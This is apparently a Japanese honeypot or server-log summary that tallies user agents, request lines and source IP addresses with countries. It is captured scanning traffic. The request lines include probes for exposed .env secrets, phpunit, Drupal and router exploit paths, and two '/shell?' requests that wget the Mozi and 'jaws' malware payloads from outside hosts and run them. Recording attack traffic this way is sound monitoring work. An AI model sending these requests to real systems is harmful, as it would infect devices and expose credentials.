2 216.218.206.67 United States

UserAgent一覧

件数 UserAgent
25 -
1 Go-http-client/1.1
1 Hello World
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
1 Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0
33 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
40 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
5 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 axios/1.3.4

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 MGLNDD_132.145.66.34_80\n
1 \x03
15 \x16\x03\x01
43 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /132.145.66.34/.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /app/config/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /audio/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /cgi-bin/.env HTTP/1.1
1 GET /cgi-bin/downloadFlile.cgi HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /conf/.env HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
6 GET /dispatch.asp HTTP/1.1
1 GET /druid/index.html HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /library/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /old/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /sites/all/libraries/mailchimp/.env HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/laravel/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET /www/.env HTTP/1.1
1 GET http[:]//azenv[.]net/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
5 POST /boaform/admin/formLogin HTTP/1.1
1 POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 37.156.115.137 Iran
3 43.158.217.205 Singapore
2 45.33.80.243 United States
1 45.56.108.128 United States
1 45.79.172.21 United States
1 45.79.181.94 United States
1 45.79.181.104 United States
2 45.81.243.34 Bulgaria
1 45.83.65.213 Germany
1 45.128.232.149 Bulgaria
1 45.145.248.50 Netherlands
19 54.37.79.75 France
2 62.233.50.179 Russia
2 64.227.41.39 United States
2 65.49.20.68 United States
1 66.240.192.82 United States
1 91.191.209.206 Bulgaria
2 91.223.227.140 Ukraine
1 94.102.51.9 United Kingdom
1 104.28.195.189 United States
1 104.28.251.139 United States
1 107.170.241.14 United States
2 109.237.97.180 Russia
1 113.195.208.226 China
1 120.85.187.221 China
5 138.197.156.73 United States
1 140.99.219.26 United States
1 152.32.188.74 Hong Kong
2 152.89.196.54 Russia
2 162.142.125.217 United States
2 170.64.177.144 United States
3 172.104.11.51 United States
3 172.105.128.13 United States
5 178.62.12.138 United States
1 179.43.177.242 Panama
1 183.15.90.67 China
1 192.155.90.220 United States
1 192.241.205.242 United States
8 193.32.162.159 Romania
1 194.55.224.203 Bulgaria
1 194.87.151.116 Czechia
1 198.235.24.17 United States

UserAgent一覧

件数 UserAgent
31 -
1 Go-http-client/1.1
1 Hello, World
2 Hello, world
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/10.1 Safari/603.1.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
20 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
5 Mozilla/5.0 zgrab/0.x
4 Mozilla/5.0
1 axios/1.3.4

リクエスト内容一覧

件数 Method Request Protocol
3 -
1 MGLNDD_13.67.44.234_80
3 \x03
1 \x16\x03\x01\x01H\x01
18 \x16\x03\x01
1 \xff\xa2\xff
1 o\xfa\xc0\xbe\xb8\xc0\xa4\xc9\x89\xa2\xc2\x8f\x83\xaf\x91\x97\xbe\xcd\xb9\xcf\xac\x9b\xb0\xab\xa0\xb6\xb1\xaa\x9d\x9c\x9f\x96\x8d\x93\xce\xb4\xb3\xb5\x98\xcd\xa6\xfa\xfa\xfa\xfa\x12\xfd\xd8\xf8\xfa\xfa\xc2\xfa\xfa\xfa\xfa\x1af\xec\xf9\xfa\xfa\xfa\xfa\xfb\xe5q\xf2\xfa\xfa\xfa\xfa\xfa\xfa\xf9wh\x97ui\xba\xea=E\xf0\x1b/\xa7XJ\xf11Y\v\xbf\xb1K\x1f
20 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /cdn-cgi/trace HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
8 GET /dispatch.asp HTTP/1.1
1 GET /druid/index.html HTTP/1.1
5 GET /favicon.ico HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+45[.]81[.]243[.]34/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
2 GET /upl.php HTTP/1.1
1 GET http[:]//azenv[.]net/ HTTP/1.1
2 HEAD /.env HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
1 POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
1 PRI * HTTP/2.0